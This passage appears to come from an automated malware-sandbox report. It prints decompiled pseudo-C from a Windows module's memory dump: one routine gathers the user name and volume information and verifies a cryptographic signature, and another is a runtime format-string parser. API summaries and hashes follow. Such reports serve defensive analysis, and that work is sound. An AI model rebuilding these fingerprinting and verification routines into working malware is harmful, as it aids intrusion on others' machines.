					_t119 = _t118 + 0x54b;
					_t26 = _t133 + 3; // 0x3
					E67705210(_t26, _t124, _t133, _t141, _t207, _t211);
					_t221 = _t214 + 0x70;
					_t139 = _t133;
					E67705440(0, _t124, _t139,  *((intOrPtr*)(_t214 + 0x50)), _t133, _t214 + 0x70);
					_t199 = _t214 + 0x70;
					_t225 = _t133;
					_t70 = memset(_t119, 0, 0x428 << 0);
					_t123 = _t124 + 0xc;
					_t116 = _t119 + 0x428;
					_t98 = 0;
					if(_t133 != 0) {
						_t70 = E677039E8(_t116, _t123, _t133, _t139, _t225, _t199);
					}
					_t163 = _t139;
					free(??);
					if(_t236 == 0) {
						L20:
						_t133 =  *(_t214 + 0x40) +  *((intOrPtr*)(_t214 + 0x60));
						if(_t238 >= _t133) {
							break;
						}
						_t234 =  *((intOrPtr*)(_t214 + 0x50));
						continue;
					} else {
						_t98 =  *_t236;
						_t136 =  *((intOrPtr*)(_t236 + 8));
						_t231 = _t136 + _t163 - 8;
						E67703938(8, _t123, _t136, _t139, _t231, _t207, _t221);
						_t208 = _t136;
						_t87 = E67703938(0x10, _t123, _t136, _t139, 0x67713018, _t208, _t221);
						_t199 = _t136;
						E67704688(_t87,  *_t236, 0x10, _t139, _t208, _t136, _t224);
						_t139 = _t136;
						E677039E8(_t116, _t123, _t136, _t139, _t208, _t199);
						E677039E8(_t116, _t123, _t136, _t139, _t199, _t199);
						_t169 = _t139;
						_t116 =  *( *((intOrPtr*)(_t139 + 8)) + 4);
						E677039E8(_t116, _t123, _t136, _t139, _t169, _t199);
						if(_t116 == 0x1bd75010) {
							_t98 = 8;
							_t232 = _t231 + _t169 - _t208;
							if( *((intOrPtr*)(_t231 + _t169 - _t208)) != 0x1bd75010) {
								goto L9;
							}
							E67703938( *((intOrPtr*)(_t232 + 8)), _t123, _t136, _t139, _t232 + 0xc, _t208, _t221);
							_t139 = _t136;
							E67703938(0x100, _t123, _t136, _t139, _t232 + _t199 + 0xc, _t208, _t221);
							_t209 = _t136;
							_t94 = E677039E8( *((intOrPtr*)(_t232 + 8)), _t123, _t136, _t139, _t236, _t199);
							r9d = 0;
							r8d = 0;
							 *(_t214 + 0x20) = _t214 + 0x38;
							__imp__CryptCreateHash();
							if(_t94 != 0) {
								r8d =  *_t139;
								r9d = 0;
								__imp__CryptHashData();
								if(_t94 != 0) {
									_t229 =  *(_t214 + 0x30);
									_t133 = _t214 + 0x68;
									r8d =  *( *(_t214 + 0x30));
									 *(_t214 + 0x28) = _t133;
									r9d = 0;
									 *(_t214 + 0x20) = r12d;
									__imp__CryptImportKey();
									if(_t94 != 0) {
										_t224 =  *((intOrPtr*)(_t214 + 0x68));
										r8d =  *_t209;
										 *(_t214 + 0x28) = r12d;
										 *(_t214 + 0x20) = _t226;
										__imp__CryptVerifySignatureW();
										_t116 = _t94;
									} else {
										__imp__CryptDestroyHash();
										_t116 = r12d;
									}
									L18:
									_t95 = E677039E8(_t116, _t123, _t133, _t139, _t209, _t199);
									_t180 = _t139;
									if(_t116 != 0) {
										_t200 =  *(_t214 + 0x48);
										E67704688(_t95, _t98, 0x8004, _t139, _t180,  *(_t214 + 0x48), _t224);
										_t226 = _t133;
										E677039E8(_t116, _t123, _t133, _t139, _t139,  *(_t214 + 0x48));
										L24:
										free();
										E677039E8(_t116, _t123, _t133, _t139, _t200, _t200);
										E677039E8(_t116, _t123, _t133, _t139, _t229, _t200);
										return E67706F80(_t98,  *(_t211 + 0x8f0) ^ _t214);
									}
									_t70 = E677039E8(_t116, _t123, _t133, _t139, _t180, _t199);
									goto L20;
								}
								__imp__CryptDestroyHash();
							}
							_t229 =  *(_t214 + 0x30);
							_t116 = r12d;
							goto L18;
						}
						L9:
						_t70 = E677039E8(_t116, _t123, _t136, _t139, _t236, _t199);
						_t229 =  *(_t214 + 0x30);
						goto L20;
					}
				}
				_t200 =  *(_t214 + 0x48);
				goto L24;
			}











































                                                                                                                                                  0x67702804
                                                                                                                                                  0x67702804
                                                                                                                                                  0x67702804
                                                                                                                                                  0x67702804
                                                                                                                                                  0x67702804
                                                                                                                                                  0x6770280a
                                                                                                                                                  0x6770280c
                                                                                                                                                  0x67702814
                                                                                                                                                  0x6770281c
                                                                                                                                                  0x67702823
                                                                                                                                                  0x6770282a
                                                                                                                                                  0x6770282d
                                                                                                                                                  0x67702834
                                                                                                                                                  0x67702837
                                                                                                                                                  0x6770283c
                                                                                                                                                  0x6770283f
                                                                                                                                                  0x67702844
                                                                                                                                                  0x6770284c
                                                                                                                                                  0x67702851
                                                                                                                                                  0x67702854
                                                                                                                                                  0x6770285a
                                                                                                                                                  0x67702864
                                                                                                                                                  0x67702868
                                                                                                                                                  0x6770286d
                                                                                                                                                  0x67702881
                                                                                                                                                  0x67702886
                                                                                                                                                  0x67702891
                                                                                                                                                  0x67702894
                                                                                                                                                  0x6770289c
                                                                                                                                                  0x6770289f
                                                                                                                                                  0x677028a4
                                                                                                                                                  0x677028a9
                                                                                                                                                  0x677028b3
                                                                                                                                                  0x677028b8
                                                                                                                                                  0x677028be
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677028c6
                                                                                                                                                  0x677028c9
                                                                                                                                                  0x677028cf
                                                                                                                                                  0x677028dd
                                                                                                                                                  0x677028e0
                                                                                                                                                  0x677028e4
                                                                                                                                                  0x677028e9
                                                                                                                                                  0x677028e9
                                                                                                                                                  0x677028ed
                                                                                                                                                  0x677028f4
                                                                                                                                                  0x677028f7
                                                                                                                                                  0x67702903
                                                                                                                                                  0x67702903
                                                                                                                                                  0x67702906
                                                                                                                                                  0x6770290e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677028fc
                                                                                                                                                  0x677028ff
                                                                                                                                                  0x677028ff
                                                                                                                                                  0x677028ff
                                                                                                                                                  0x6770291d
                                                                                                                                                  0x67702926
                                                                                                                                                  0x6770292b
                                                                                                                                                  0x67702941
                                                                                                                                                  0x67702946
                                                                                                                                                  0x6770294b
                                                                                                                                                  0x67702953
                                                                                                                                                  0x6770296b
                                                                                                                                                  0x67702977
                                                                                                                                                  0x6770297c
                                                                                                                                                  0x6770298a
                                                                                                                                                  0x6770298f
                                                                                                                                                  0x6770298f
                                                                                                                                                  0x6770298f
                                                                                                                                                  0x67702991
                                                                                                                                                  0x67702994
                                                                                                                                                  0x6770299e
                                                                                                                                                  0x677029a6
                                                                                                                                                  0x677029a9
                                                                                                                                                  0x677029ae
                                                                                                                                                  0x677029b8
                                                                                                                                                  0x677029bd
                                                                                                                                                  0x677029bd
                                                                                                                                                  0x677029bd
                                                                                                                                                  0x677029bd
                                                                                                                                                  0x677029c2
                                                                                                                                                  0x677029c7
                                                                                                                                                  0x677029c7
                                                                                                                                                  0x677029cc
                                                                                                                                                  0x677029cf
                                                                                                                                                  0x677029d7
                                                                                                                                                  0x67702b5f
                                                                                                                                                  0x67702b64
                                                                                                                                                  0x67702b6c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67702b6e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677029dd
                                                                                                                                                  0x677029dd
                                                                                                                                                  0x677029e0
                                                                                                                                                  0x677029e9
                                                                                                                                                  0x677029f1
                                                                                                                                                  0x67702a02
                                                                                                                                                  0x67702a05
                                                                                                                                                  0x67702a10
                                                                                                                                                  0x67702a13
                                                                                                                                                  0x67702a1b
                                                                                                                                                  0x67702a1e
                                                                                                                                                  0x67702a26
                                                                                                                                                  0x67702a2f
                                                                                                                                                  0x67702a34
                                                                                                                                                  0x67702a37
                                                                                                                                                  0x67702a43
                                                                                                                                                  0x67702a57
                                                                                                                                                  0x67702a5f
                                                                                                                                                  0x67702a66
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67702a72
                                                                                                                                                  0x67702a81
                                                                                                                                                  0x67702a84
                                                                                                                                                  0x67702a8c
                                                                                                                                                  0x67702a8f
                                                                                                                                                  0x67702aa0
                                                                                                                                                  0x67702aa3
                                                                                                                                                  0x67702aa6
                                                                                                                                                  0x67702ab0
                                                                                                                                                  0x67702ab8
                                                                                                                                                  0x67702ac7
                                                                                                                                                  0x67702ad3
                                                                                                                                                  0x67702ad6
                                                                                                                                                  0x67702ade
                                                                                                                                                  0x67702aed
                                                                                                                                                  0x67702af9
                                                                                                                                                  0x67702afe
                                                                                                                                                  0x67702b06
                                                                                                                                                  0x67702b0b
                                                                                                                                                  0x67702b0e
                                                                                                                                                  0x67702b13
                                                                                                                                                  0x67702b20
                                                                                                                                                  0x67702b2d
                                                                                                                                                  0x67702b32
                                                                                                                                                  0x67702b39
                                                                                                                                                  0x67702b3e
                                                                                                                                                  0x67702b43
                                                                                                                                                  0x67702b49
                                                                                                                                                  0x67702b22
                                                                                                                                                  0x67702b22
                                                                                                                                                  0x67702b28
                                                                                                                                                  0x67702b28
                                                                                                                                                  0x67702b4b
                                                                                                                                                  0x67702b4e
                                                                                                                                                  0x67702b53
                                                                                                                                                  0x67702b58
                                                                                                                                                  0x67702b78
                                                                                                                                                  0x67702b80
                                                                                                                                                  0x67702b88
                                                                                                                                                  0x67702b8b
                                                                                                                                                  0x67702b97
                                                                                                                                                  0x67702b9c
                                                                                                                                                  0x67702ba4
                                                                                                                                                  0x67702bac
                                                                                                                                                  0x67702bdd
                                                                                                                                                  0x67702bdd
                                                                                                                                                  0x67702b5a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67702b5a
                                                                                                                                                  0x67702ae5
                                                                                                                                                  0x67702ae5
                                                                                                                                                  0x67702aba
                                                                                                                                                  0x67702abf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67702abf
                                                                                                                                                  0x67702a45
                                                                                                                                                  0x67702a48
                                                                                                                                                  0x67702a4d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67702a4d
                                                                                                                                                  0x677029d7
                                                                                                                                                  0x67702b92
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 6770334C: malloc.LIBCMT ref: 677033A6
                                                                                                                                                    • Part of subcall function 6770334C: lstrcpyA.KERNEL32 ref: 677033B4
                                                                                                                                                    • Part of subcall function 6770334C: free.LIBCMT ref: 677033BD
                                                                                                                                                    • Part of subcall function 6770334C: GetUserNameW.ADVAPI32 ref: 677033D7
                                                                                                                                                    • Part of subcall function 6770334C: lstrlenW.KERNEL32 ref: 677033E5
                                                                                                                                                    • Part of subcall function 6770334C: GetVolumeInformationW.KERNEL32 ref: 67703451
                                                                                                                                                    • Part of subcall function 6770334C: wsprintfA.USER32 ref: 67703468
                                                                                                                                                  • lstrlenA.KERNEL32 ref: 67702854
                                                                                                                                                    • Part of subcall function 67704688: CryptImportKey.ADVAPI32 ref: 677046EE
                                                                                                                                                    • Part of subcall function 677039E8: free.LIBCMT ref: 67703A03
                                                                                                                                                  • malloc.LIBCMT ref: 677028CF
                                                                                                                                                    • Part of subcall function 67706FE0: _FF_MSGBANNER.LIBCMT ref: 67707010
                                                                                                                                                    • Part of subcall function 67706FE0: RtlAllocateHeap.NTDLL(?,?,?,67703907,?,?,?,67703955,?,?,?,677042F0,?,?,?,67704207), ref: 67707035
                                                                                                                                                    • Part of subcall function 67706FE0: _callnewh.LIBCMT ref: 6770704E
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707059
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707064
                                                                                                                                                  • swprintf.LIBCMT ref: 6770294B
                                                                                                                                                  • free.LIBCMT ref: 67702953
                                                                                                                                                  • free.LIBCMT ref: 677029CF
                                                                                                                                                  • CryptCreateHash.ADVAPI32 ref: 67702AB0
                                                                                                                                                  • CryptHashData.ADVAPI32 ref: 67702AD6
                                                                                                                                                  • CryptDestroyHash.ADVAPI32 ref: 67702AE5
                                                                                                                                                  • CryptImportKey.ADVAPI32 ref: 67702B13
                                                                                                                                                  • CryptDestroyHash.ADVAPI32 ref: 67702B22
                                                                                                                                                  • CryptVerifySignatureW.ADVAPI32 ref: 67702B43
                                                                                                                                                  • free.LIBCMT ref: 67702B9C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Crypt$free$Hash$DestroyImport_errnolstrlenmalloc$AllocateCreateDataHeapInformationNameSignatureUserVerifyVolume_callnewhlstrcpyswprintfwsprintf
                                                                                                                                                  • String ID: %s%s%s
                                                                                                                                                  • API String ID: 1566976015-3094730333
                                                                                                                                                  • Opcode ID: e266177b23bdbd9746361eb3d2308008c7ff3f2576a0955c00cc350af4ce9338
                                                                                                                                                  • Instruction ID: 46142b4ab11860e8cf0699efc50daeb4ecd9ddaceb612453c983635837e968c1
                                                                                                                                                  • Opcode Fuzzy Hash: e266177b23bdbd9746361eb3d2308008c7ff3f2576a0955c00cc350af4ce9338
                                                                                                                                                  • Instruction Fuzzy Hash: 3B91A2B231868096DA10DF22E65876EA7A5F78EBDCF944025DF8D4BB18EF38C545C701
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770B370, Relevance: 20.3, APIs: 13, Instructions: 754COMMONCrypto
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 45%
                                                                                                                                                  			E6770B370(void* __ebx, signed int __ecx, void* __edx, signed int __esi, long long __rbx, long long __rcx, signed long long __rdx, void* __r8, signed short* __r9, signed long long __r10, void* __r11) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				signed int _t231;
				signed int _t235;
				signed int _t238;
				signed int _t243;
				signed int _t244;
				signed int _t248;
				void* _t254;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				void* _t272;
				signed int _t273;
				signed int _t274;
				signed int _t276;
				signed int _t277;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				void* _t294;
				signed int _t297;
				signed int _t298;
				signed int _t302;
				signed int _t303;
				signed int _t307;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t326;
				signed int _t327;
				signed long long _t332;
				signed long long _t333;
				intOrPtr _t335;
				signed int _t342;
				signed int _t347;
				signed int* _t348;
				signed int _t349;
				intOrPtr _t354;
				signed long long _t356;
				signed int _t377;
				signed int _t378;
				void* _t380;
				void* _t384;
				void* _t386;
				signed long long _t387;
				signed short* _t390;
				signed long long _t391;
				signed short* _t402;
				signed long long _t406;
				void* _t407;
				void* _t408;
				signed int _t412;
				signed short* _t414;
				signed short* _t416;

				_t407 = __r11;
				_t406 = __r10;
				_t402 = __r9;
				_t273 = __ecx;
				_t272 = __ebx;
				 *((long long*)(_t386 + 0x18)) = __rbx;
				_push(_t380);
				_push(_t378);
				_push(_t408);
				_t384 = _t386 - 0x3d0;
				_t387 = _t386 - 0x4d0;
				_t332 =  *0x67716000; // 0x9b7b11e8241
				_t333 = _t332 ^ _t387;
				 *(_t384 + 0x3c0) = _t333;
				 *((long long*)(_t387 + 0x78)) = __rcx;
				 *(_t384 - 0x80) = __rdx;
				_t414 = __r9;
				 *(_t387 + 0x50) = __r9;
				 *(_t387 + 0x70) = 0;
				r12d = 0;
				 *(_t387 + 0x58) = 0;
				 *(_t387 + 0x48) = 0;
				 *(_t387 + 0x4c) = 0;
				 *(_t387 + 0x6c) = 0;
				 *(_t387 + 0x44) = 0;
				E67707498(_t333, _t384 - 0x70, __r8);
				r10d = 0;
				if(__rcx != 0) {
					_t390 =  *(_t384 - 0x80);
					__eflags = _t390;
					if(_t390 == 0) {
						goto L1;
					}
					r13d =  *_t390 & 0x0000ffff;
					_t302 = r10d;
					r15d = r10d;
					r9d = r10d;
					 *(_t384 - 0x50) = __r10;
					 *(_t387 + 0x40) = _t302;
					__eflags = r13w;
					if(r13w == 0) {
						L223:
						__eflags =  *((intOrPtr*)(_t384 - 0x58)) - r10b;
						if( *((intOrPtr*)(_t384 - 0x58)) != r10b) {
							_t354 =  *((intOrPtr*)(_t384 - 0x60));
							_t210 = _t354 + 0xc8;
							 *_t210 =  *(_t354 + 0xc8) & 0xfffffffd;
							__eflags =  *_t210;
						}
						goto L226;
					} else {
						_t347 =  *(_t384 - 0x48);
						_t326 = __esi | 0xffffffff;
						__eflags = _t326;
						_t273 = _t380 + 0x59;
						r11d = _t380 + 0x21;
						while(1) {
							_t391 =  &(_t390[1]);
							 *(_t384 - 0x80) = _t391;
							__eflags = _t302;
							if(_t302 < 0) {
								break;
							} else {
								_t229 = (r13w & 0xffffffff) - r11w;
								__eflags = (r13w & 0xffffffff) - r11w - _t273;
								if((r13w & 0xffffffff) - r11w > _t273) {
									_t273 = r10d;
								} else {
									_t229 = r13w & 0xffffffff;
									_t273 =  *(_t333 + 0x67712000) & 0xf;
								}
							}
							_t356 = _t273 + _t273 * 8 + r9d;
							_t333 = 0x67712020;
							r9d =  *(_t356 + 0x67712020) & 0x000000ff;
							r9d = r9d >> 4;
							 *(_t387 + 0x68) = r9d;
							__eflags = r9d - 8;
							if(r9d == 8) {
								L227:
								E6770851C(_t333);
								 *_t333 = 0x16;
								E67709254();
								r11d = 0;
								__eflags =  *((intOrPtr*)(_t384 - 0x58)) - r11b;
								if( *((intOrPtr*)(_t384 - 0x58)) != r11b) {
									_t335 =  *((intOrPtr*)(_t384 - 0x60));
									_t216 = _t335 + 0xc8;
									 *_t216 =  *(_t335 + 0xc8) & 0xfffffffd;
									__eflags =  *_t216;
								}
								L226:
								return E67706F80(_t273,  *(_t384 + 0x3c0) ^ _t387);
							}
							_t274 = r9d;
							__eflags = r9d;
							if(r9d == 0) {
								L196:
								 *(_t387 + 0x44) = 1;
								E6770B238(_t229,  *((intOrPtr*)(_t387 + 0x78)), _t387 + 0x40);
								r10d = 0;
								L172:
								_t302 =  *(_t387 + 0x40);
								r11d = 0x20;
								L218:
								r9d =  *(_t387 + 0x68);
								_t390 =  *(_t384 - 0x80);
								L219:
								_t273 = 0x58;
								L220:
								r13d =  *_t390 & 0x0000ffff;
								__eflags = r13w;
								if(r13w != 0) {
									continue;
								}
								break;
							}
							_t276 = _t274 - 1;
							__eflags = _t276;
							if(_t276 == 0) {
								 *(_t384 - 0x78) = r10d;
								 *(_t387 + 0x6c) = r10d;
								 *(_t387 + 0x58) = r10d;
								 *(_t387 + 0x4c) = r10d;
								r12d = r10d;
								 *(_t387 + 0x48) = _t326;
								 *(_t387 + 0x44) = r10d;
								goto L219;
							}
							_t277 = _t276 - 1;
							__eflags = _t277;
							if(_t277 == 0) {
								_t231 = r13w & 0xffffffff;
								__eflags = _t231 - r11d;
								if(_t231 == r11d) {
									r12d = r12d | 0x00000002;
									goto L219;
								}
								__eflags = _t231 - 0x23;
								if(_t231 == 0x23) {
									asm("inc ecx");
									goto L219;
								}
								__eflags = _t231 - 0x2b;
								if(_t231 == 0x2b) {
									r12d = r12d | 0x00000001;
									goto L219;
								}
								__eflags = _t231 - 0x2d;
								if(_t231 == 0x2d) {
									r12d = r12d | 0x00000004;
									goto L219;
								}
								__eflags = _t231 - 0x30;
								_t273 = 0x58;
								if(_t231 == 0x30) {
									r12d = r12d | 0x00000008;
								}
								goto L220;
							}
							_t281 = _t277 - 1;
							__eflags = _t281;
							if(_t281 == 0) {
								__eflags = r13w - 0x2a;
								if(r13w != 0x2a) {
									 *(_t387 + 0x58) = 0x67712020 + _t356 * 2 - 0x30;
									goto L219;
								}
								_t235 =  *_t414;
								_t414 =  &(_t414[4]);
								_t273 = 0x58;
								 *(_t387 + 0x50) = _t414;
								 *(_t387 + 0x58) = _t235;
								__eflags = _t235;
								if(_t235 < 0) {
									r12d = r12d | 0x00000004;
									 *(_t387 + 0x58) =  ~_t235;
								}
								goto L220;
							}
							_t283 = _t281 - 1;
							__eflags = _t283;
							if(_t283 == 0) {
								 *(_t387 + 0x48) = r10d;
								goto L219;
							}
							_t284 = _t283 - 1;
							__eflags = _t284;
							if(_t284 == 0) {
								__eflags = r13w - 0x2a;
								if(r13w != 0x2a) {
									_t185 = _t356 * 2; // -48
									 *(_t387 + 0x48) = 0x67712020 + _t185 - 0x30;
									goto L219;
								}
								_t314 =  *_t414;
								_t414 =  &(_t414[4]);
								_t273 = 0x58;
								 *(_t387 + 0x50) = _t414;
								 *(_t387 + 0x48) = _t314;
								__eflags = _t314;
								if(_t314 < 0) {
									_t314 = _t326;
									 *(_t387 + 0x48) = _t326;
								}
								goto L220;
							}
							_t286 = _t284 - 1;
							__eflags = _t286;
							if(_t286 == 0) {
								_t238 = r13w & 0xffffffff;
								__eflags = _t238 - 0x49;
								if(_t238 == 0x49) {
									asm("inc ecx");
									__eflags =  *_t391 - 0x36;
									if( *_t391 != 0x36) {
										L186:
										__eflags =  *_t391 - 0x33;
										if( *_t391 != 0x33) {
											L189:
											__eflags =  *_t391 - 0x64;
											if( *_t391 == 0x64) {
												goto L219;
											}
											__eflags =  *_t391 - 0x69;
											if( *_t391 == 0x69) {
												goto L219;
											}
											__eflags =  *_t391 - 0x6f;
											if( *_t391 == 0x6f) {
												goto L219;
											}
											_t173 = _t333 - 0x1d; // 0x58
											_t273 = _t173;
											__eflags =  *_t391 - 0x75;
											if( *_t391 == 0x75) {
												goto L220;
											}
											_t174 = _t356 + 0x20; // 0x78
											_t229 = _t174;
											__eflags =  *_t391 - _t174;
											if( *_t391 == _t174) {
												goto L220;
											}
											__eflags =  *_t391 - _t273;
											if( *_t391 == _t273) {
												goto L220;
											}
											 *(_t387 + 0x68) = r10d;
											goto L196;
										}
										__eflags =  *(_t391 + 2) - 0x32;
										if( *(_t391 + 2) != 0x32) {
											goto L189;
										}
										_t390 = _t391 + 4;
										asm("inc ecx");
										goto L219;
									}
									__eflags =  *(_t391 + 2) - 0x34;
									if( *(_t391 + 2) != 0x34) {
										goto L186;
									}
									_t390 = _t391 + 4;
									asm("inc ecx");
									goto L219;
								}
								__eflags = _t238 - 0x68;
								if(_t238 == 0x68) {
									r12d = r12d | r11d;
									goto L219;
								}
								__eflags = _t238 - 0x6c;
								if(_t238 == 0x6c) {
									__eflags =  *_t391 - 0x6c;
									_t273 = 0x58;
									if( *_t391 != 0x6c) {
										r12d = r12d | 0x00000010;
									} else {
										_t390 = _t391 + 2;
										asm("inc ecx");
									}
								} else {
									_t273 = 0x58;
									__eflags = _t238 - 0x77;
									if(_t238 == 0x77) {
										asm("inc ecx");
									}
								}
								goto L220;
							}
							__eflags = _t286 != 1;
							if(_t286 != 1) {
								goto L219;
							}
							_t243 = r13w & 0xffffffff;
							__eflags = _t243 - 0x64;
							if(__eflags > 0) {
								__eflags = _t243 - 0x65;
								if(_t243 < 0x65) {
									L31:
									r13d =  *(_t387 + 0x44);
									L32:
									L33:
									__eflags =  *(_t387 + 0x6c) - r10d;
									if( *(_t387 + 0x6c) != r10d) {
										L168:
										r11d = 0x20;
										L169:
										_t302 =  *(_t387 + 0x40);
										L170:
										_t333 =  *(_t384 - 0x50);
										__eflags = _t333;
										if(_t333 == 0) {
											_t314 =  *(_t387 + 0x48);
											_t326 = _t326 | 0xffffffff;
											__eflags = _t326;
											goto L218;
										}
										free();
										_t314 =  *(_t387 + 0x48);
										r10d = 0;
										 *(_t384 - 0x50) = _t406;
										_t326 = _t326 | 0xffffffff;
										__eflags = _t326;
										goto L172;
									}
									__eflags = r12b & 0x00000040;
									if(__eflags == 0) {
										L149:
										_t323 =  *(_t387 + 0x4c);
										L150:
										_t244 = 0x20;
										L151:
										r14d =  *(_t387 + 0x58);
										_t382 =  *((intOrPtr*)(_t387 + 0x78));
										r14d = r14d - r15d;
										r14d = r14d - _t323;
										__eflags = r12b & 0x0000000c;
										if(__eflags == 0) {
											E6770B270(_t244, r14d, _t347, _t382, _t384, _t382, _t387 + 0x40);
										}
										_t303 = _t323;
										E6770B2C4(_t303, __eflags, _t347, _t387 + 0x5c, _t378, _t382, _t382, _t387 + 0x40);
										__eflags = r12b & 0x00000008;
										if((r12b & 0x00000008) != 0) {
											__eflags = r12b & 0x00000004;
											if((r12b & 0x00000004) == 0) {
												_t303 = r14d;
												E6770B270(0x30, _t303, _t347, _t382, _t384, _t382, _t387 + 0x40);
											}
										}
										__eflags = r13d;
										if(__eflags != 0) {
											L163:
											_t402 = _t387 + 0x40;
											E6770B2C4(r15d, __eflags, _t347, _t347, _t378, _t382, _t382, _t402);
											r10d = 0;
											__eflags = r10d;
											goto L164;
										} else {
											__eflags = r15d;
											if(__eflags <= 0) {
												goto L163;
											}
											_t378 = _t347;
											_t327 = r15d;
											while(1) {
												_t402 = _t384 - 0x70;
												_t377 = _t378;
												_t326 = _t327 - 1;
												_t248 = E6770E834(_t326, _t347, _t387 + 0x60, _t377, _t378, _t382,  *((intOrPtr*)( *((intOrPtr*)(_t384 - 0x70)) + 0x10c)), _t402, _t408);
												r10d = 0;
												_t412 = _t248;
												__eflags = _t248;
												if(_t248 <= 0) {
													break;
												}
												_t377 =  *((intOrPtr*)(_t387 + 0x78));
												E6770B238(_t248, _t377, _t387 + 0x40);
												_t378 = _t378 + _t412;
												r10d = 0;
												__eflags = _t326;
												if(_t326 > 0) {
													continue;
												}
												_t382 =  *((intOrPtr*)(_t387 + 0x78));
												L164:
												_t302 =  *(_t387 + 0x40);
												L165:
												__eflags = _t302;
												if(_t302 < 0) {
													L173:
													_t414 =  *(_t387 + 0x50);
													r11d = 0x20;
													goto L170;
												}
												__eflags = r12b & 0x00000004;
												if((r12b & 0x00000004) == 0) {
													goto L173;
												}
												_t402 = _t387 + 0x40;
												E6770B270(0x20, r14d, _t347, _t382, _t384, _t382, _t402);
												_t414 =  *(_t387 + 0x50);
												r10d = 0;
												__eflags = r10d;
												goto L168;
											}
											_t382 =  *((intOrPtr*)(_t387 + 0x78));
											_t302 = _t303 | 0xffffffff;
											 *(_t387 + 0x40) = _t302;
											goto L165;
										}
									}
									asm("inc ecx");
									if(__eflags >= 0) {
										__eflags = r12b & 0x00000001;
										if((r12b & 0x00000001) == 0) {
											__eflags = r12b & 0x00000002;
											if((r12b & 0x00000002) == 0) {
												goto L149;
											}
											_t244 = 0x20;
											 *(_t387 + 0x5c) = 0x20;
											_t134 = _t333 - 0x1f; // 0x1
											_t323 = _t134;
											 *(_t387 + 0x4c) = _t323;
											goto L151;
										}
										 *(_t387 + 0x5c) = 0x2b;
										goto L37;
									} else {
										 *(_t387 + 0x5c) = _t320;
										L37:
										_t323 = 1;
										 *(_t387 + 0x4c) = 1;
										goto L150;
									}
								}
								_t294 = 0x67;
								__eflags = _t243 - 0x67;
								if(_t243 <= 0x67) {
									L62:
									r12d = r12d | 0x00000040;
									_t347 = _t384 - 0x40;
									_t326 = 0x200;
									__eflags = _t314;
									if(__eflags >= 0) {
										if(__eflags != 0) {
											__eflags = _t314 - 0x200;
											r15d = 0xa3;
											_t316 =  >  ? 0x200 : _t314;
											 *(_t387 + 0x48) = _t316;
											__eflags = _t316 - r15d;
											if(_t316 <= r15d) {
												r15d = _t316;
												L134:
												_t333 =  *_t414;
												_t414 =  &(_t414[4]);
												 *(_t387 + 0x50) = _t414;
												_t382 = _t326;
												 *(_t384 - 0x48) = _t333;
												__imp__DecodePointer();
												 *((long long*)(_t387 + 0x30)) = _t384 - 0x70;
												r9d = r13b;
												 *(_t387 + 0x28) =  *(_t384 - 0x78);
												_t377 = _t347;
												 *(_t387 + 0x20) = r15d;
												_t254 =  *_t333();
												_t319 = r12d & 0x00000080;
												__eflags = _t319;
												if(_t319 != 0) {
													__eflags = r15d;
													if(r15d == 0) {
														__imp__DecodePointer();
														_t377 = _t384 - 0x70;
														_t254 =  *_t333();
													}
												}
												__eflags = r13w - 0x67;
												if(r13w == 0x67) {
													__eflags = _t319;
													if(_t319 == 0) {
														__imp__DecodePointer();
														_t377 = _t384 - 0x70;
														_t254 =  *_t333();
													}
												}
												_t320 = 0x2d;
												__eflags =  *_t347 - dil;
												if( *_t347 == dil) {
													asm("inc ecx");
													_t347 = _t347 + 1;
													__eflags = _t347;
												}
												_t255 = E6770D5B0(_t254, _t347);
												r10d = 0;
												r15d = _t255;
												L144:
												r13d =  *(_t387 + 0x44);
												goto L33;
											}
											_t324 = _t316 + 0x15d;
											E6770C0CC(_t347, _t324, _t378, _t382);
											 *(_t384 - 0x50) = _t333;
											__eflags = _t333;
											if(_t333 == 0) {
												L64:
												 *(_t387 + 0x48) = r15d;
												goto L134;
											}
											_t347 = _t333;
											_t326 = _t324;
											L132:
											r15d =  *(_t387 + 0x48);
											goto L134;
										}
										__eflags = r13w - _t294;
										if(r13w != _t294) {
											goto L132;
										}
										r15d = 1;
										goto L64;
									}
									r15d = 6;
									goto L64;
								}
								_t273 = 0x69;
								__eflags = _t243 - 0x69;
								if(_t243 == 0x69) {
									L91:
									r12d = r12d | 0x00000040;
									__eflags = r12d;
									L92:
									r9d = 0xa;
									L93:
									_t326 = 0x200;
									L94:
									r13d = 0x30;
									L95:
									_t307 =  *(_t387 + 0x4c);
									L96:
									_t257 = 0x8000;
									__eflags = 0x00008000 & r12d;
									if(__eflags == 0) {
